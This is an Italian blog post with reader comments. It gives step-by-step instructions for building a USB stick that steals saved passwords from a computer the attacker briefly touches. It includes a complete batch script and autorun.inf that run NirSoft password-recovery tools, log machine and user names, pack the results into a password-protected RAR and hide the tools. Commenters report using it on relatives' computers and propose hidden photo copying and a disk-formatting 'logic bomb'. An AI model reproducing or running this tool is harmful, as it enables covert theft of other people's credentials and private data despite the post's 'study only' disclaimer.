Rubare tutte le password di un computer con una chiavetta USB

image

( la foto non centra molto ma era simpatica….XD )

Il sito web Nirsoft fornisce diversi programmi gratuiti per recuperare le password salvate nel computer che si sta usando nel caso in cui le si dimenticano. E’ possibile però usare questi programmi gratuiti per altri scopi, come rubare le password del computer che si sta utilizzando.

Se un malintenzionato ha accesso fisico al computer da cui rubare le password, ha a disposizione solo pochi secondi per compiere l’”operazione”. Da questa necessità, ecco l’idea di usare una chiavetta USB. Con questo articolo, voglio semplicemente farvi vedere come sia facile creare una chiavetta USB che, inserita nel computer che ci interessa, salva le password trovate all’interno della chiavetta stessa.

Così facendo, basta collegare la chiavetta al computer che ci interessa, fare un semplice click e dopo qualche secondo staccare la chiavetta ed allontanarci dal computer con le password. Per realizzare questa chiavetta USB speciale, prima di tutto, create una cartella sul vostro desktop con il nome di Chiavetta. Questa cartella conterrà tutti i file che andranno copiati nella chiavetta.

Collegatevi alla pagina del sito web di Nirsoft per scaricare i programmi per recuperare le password. Vi consiglio di scaricare solo i programmi che vi recuperano le password che vi interessano. Se avete intenzione, ad esempio, di recuperare solo le password dei programmi di chat e quelli delle e-mail, scaricate i programmi MessenPass e Mail PassView.

Dopo aver scaricato i pacchetti con i programmi per recuperare le password, estraeteli nella cartella Chiavetta. In questa cartella lasciate solo i programmi veri e propri: cancellate, in breve, gli altri file come il readme.txt o la guida di utilizzo del programma.

A questo punto, scaricate ed installate l’ultima versione di Winrar. Andate su questa pagina e scaricate WinRAR. Dopo aver installato Winrar, andate su C:/Programmi/WinRAR, copiate ed incollate il programma Rar.exe nella cartella del desktop Chiavetta.

Adesso aprite il Blocco Note, e scrivete la seguente riga per ogni programma che recupera le password che avete inserito nella cartella Chiavetta:

@nomedelprogramma.exe /sverhtml nomedelprogramma.html

Al termine del file scrivete, invece, le righe:

REM Scrittura del file di log
@echo COMPUTERNAME = %COMPUTERNAME% > log.txt
@echo USERNAME = %USERNAME% >> log.txt
@echo USERDOMAIN = %USERDOMAIN% >> log.txt
@echo USERPROFILE = %USERPROFILE% >> log.txt
@echo. >> log.txt
@echo Oggi e’ %DATE% e sono le %TIME% >> log.txt

REM Compressione
@rar.exe a -pPASSWORD backup_%random%.rar *.html log.txt > nul

REM Eliminazione e celamento dei file usati
@del *.html
@del log.txt
@attrib +h *.exe
@attrib +h autorun.inf

In breve, quando avvierete questo piccolo programmino, le password verranno recuperate dal computer e salvate in diversi file .HTML. A questo punto, questi file HTML vengono inseriti in un archivio .RAR protetto da password. La password dell’archivio deve essere specificata al posto della parola PASSWORD.

La password è case sensitive: fanno differenza, quindi, le lettere maiuscole e quelle minuscole. Alla fine i programmi utilizzati per recuperare le password vengono nascosti e le pagine HTML eliminate, poichè già inserite nell’archivio .RAR. Nel mio caso (programmi MessenPass e Mail PassView), ho scritto queste righe:

@mspass.exe /sverhtml mspass.html
@mailpv.exe /sverhtml mailpv.html

REM Scrittura del file di log
@echo COMPUTERNAME = %COMPUTERNAME% > log.txt
@echo USERNAME = %USERNAME% >> log.txt
@echo USERDOMAIN = %USERDOMAIN% >> log.txt
@echo USERPROFILE = %USERPROFILE% >> log.txt
@echo. >> log.txt
@echo Oggi e’ %DATE% e sono le %TIME% >> log.txt

REM Compressione
@rar.exe a -pPASSWORD backup_%random%.rar *.html log.txt > nul

REM Eliminazione e celamento dei file usati
@del *.html
@del log.txt
@attrib +h *.exe
@attrib +h autorun.inf

Alla fine, salvate il file con il nome lancia.bat: andate semplicemente su File/Salva file con nome… e, nella finestra che si apre, scrivete lancia.bat in Nome file. Il file deve essere salvato nella Chiavetta.

Dopo aver creato il file lancia.bat, create il file autorun.inf sempre con il Blocco note:

[autorun]
open=lancia.bat
action=Preleva password

A questo punto avete finito. Nella cartella troverete i seguenti file:

Contenuto chiavetta

Dovete semplicemente copiare tutti i file nella cartella principale della vostra chiavetta USB per concludere la sua creazione. Se volete fare delle prove, dopo aver copiato i file, estraete ed inserite la chiavetta. Verrà aperta la seguente finestra:

Chiavetta USB

Se selezionate la prima voce (Preleva password) e fate click sul tasto OK, le password del computer verranno salvate all’interno dell’archivio protetto .RAR. A questo punto, basta staccare la chiavetta ed andare in un computer sicuro con Winrar installato per leggere le password trovate.

L’articolo è puramente a scopo di studio e l’autore non si ritiene responsabile per eventuali usi impropri. Rubare password che non siano le proprie è illegale.

Fonte: blog di aranzulla

Foto di GlamGal su flickr.com

27 Risposte

  1. […] ← WWDC 08: Apple iPhone 3G, Mac OS X Snow Leopard e MobileMe Rubare tutte le password di un computer con una chiavetta USB […]

    • salve io ho provato a fare come sopra indicato, però ci sono un paio di problemi, 1) quando inserisco la chiavetta non mi esce il mess preleva password 2) se provo a farlo manualmente aprendo il file autorun.inf, il programma cattura i dati e gli indirizzi e-mail presenti sul mio Pc ma non riesce a recuperare le password…… come mai ??? cosa devo fare ??? vi prego aiutatemi

      • scusami ho sbagliato a scrivere, invece del file autorun.inf volevo dire lancia.bat rispondetemi per favore

  2. ciao………io ho provato…..prima sul mio……. e va tt bene………poi su qll di mia sorella………ma nell’html c’è solo scritto il nome del prog utilizzato!!!!!!!!!!!!!!!!!!!!!!!
    help

  3. perchè tua sorella si è fatta furba e non ha memorizzato passw nel suo pc! mi disp😄

  4. ciao………..ascolta quando provo ad estrarre i file ricavati dal pc mi dice di inserire la parola chiave per il file crittografato:log.txt io metto case sensitive ma apre una finestra di winrar con scritto che è fallita la verifica del file crc per il file crittografato log.txt (parola chiave errata)…….cosa devo fare??? grazie in anticipo…..risp

  5. mi dispiace non devi scrivere case sensitive ma la password che hai messo Apposto di PASSWORD, sè non hai modificato il campo password dopo -p la password sarà password. prova a mettere nel tuo file cittografato la frase: PASSWORD e vedi che si apre….

  6. scusatemi, ma quando vado ad aprire il file zippato di messenpass, il file .EXE non me lo estrae; se provo ad eseguirlo da dento la finestra di winrar nn me lo fa partire…come mai? chi mi puo aiutare? grazie mille

  7. ciao ascolta ho un problemino….🙂
    nn ho ben capito cosa devo fare quando ho finito di scrivere il primo pezzo sul bloc note!!!!
    mi puoi spiegare..:???
    grazie

  8. ciao io volevo invece sapere se esiste un programma o una stessa applicazione che permetta una volta inserita una chiavetta usb in un computer, di ricercare e copiare in modalita nascosta foto e video contenute in un computer.

  9. @simo: facilissimo con uno scriptin batch! La modalità è simile a sopra… ma… a te scoprirlo!

  10. ciao a tutti scusate…..ma io ho installato winrar…..ma non trovo il prgramma rar.exe….come faccio????

  11. sono riuscito ke figoooooo

  12. ciao.. ho un problema; una volta inserita la chiavetta nel pc non mi si apre la finestra dell’autoplay della chiavetta stessa, quindi non visualizzo l’icona “preleva password”, quella che c’è sopra l’icona “apri cartella per visualizzare i file”. Come posso fare?

  13. ciao….come faccio a impostare l’auto play?

  14. raga è solo un bat ma è meglio fare una bomba logica logico eh? andate su emule e cercate il programma che formatta 3 gb secondo e poi usate una procedura simile a quella x rubare pasword x msn n remoto!!!!

  15. Salve hackingmatt, so ke questo post è vecchio, ma t volevo chiedere dopo aver creato tt questi file dobbiamo unirli in un file .exe o no??

  16. quando apro i html, non mi fa vedere le password, eppure il mio pc ha delle password salvate

  17. quando apro i html, non mi fa vedere le password, eppure il mio pc ha delle password salvate a

  18. scusa ma come mai nn mi esce il comando Preleva password? ti sarei grato se mi aiutassi

  19. io, una volta che ho fatto tutto questo l’ho provata sul mio pc e ha funzionato.
    adesso però il pc non rileva più la usb.
    potrebbe essere colpa del fatto che non ho estratto i file in una cartella sul pc ma direttamente sulla usb?
    AIUTO!!!!!!!!!!!!!

  20. a me, dopo aver fatto questa procedura non viene più visualizzata la usb
    come posso fare!!!!!!!!!!!!!!

  21. non mi parte l’autorun è tt aposto ma nn va dv per forza farlo manualmente aprendo il file lancia.bat
    cm faccio a farlo partire cn l’autorun è tt a posto il file autorun ma nn va come faccio

  22. salvo per favore sono seawolfer accetta il mio msn cosi m aiuti per favore

  23. Sfigato….hai pubblicato un’articolo rubato dal sito di Salvatore Aranzulla..che è addirittura più vecchio di 2 anni….mamma mia che vergogna…alemno aggiungi i credits….non hai manco cambiato una virgola!!!

    • dal momento che la fonte è ben specificata a fondo articolo e a suo tempo il blog aveva licenza di copiare specificando la fonte non ho commesso nulla di anormale… anzi, ho diffuso la conoscenza.. sfigato

  24. scusa ma io non ho capito cosa va scritto al posto di “computername” e “username”.
    il nome del mio pc e del mio account o quello del pc su cui voglio provare?

Lascia un commento

Effettua il login con uno di questi metodi per inviare il tuo commento:

Logo WordPress.com

Stai commentando usando il tuo account WordPress.com. Chiudi sessione / Modifica )

Foto Twitter

Stai commentando usando il tuo account Twitter. Chiudi sessione / Modifica )

Foto di Facebook

Stai commentando usando il tuo account Facebook. Chiudi sessione / Modifica )

Google+ photo

Stai commentando usando il tuo account Google+. Chiudi sessione / Modifica )

Connessione a %s...

%d blogger cliccano Mi Piace per questo: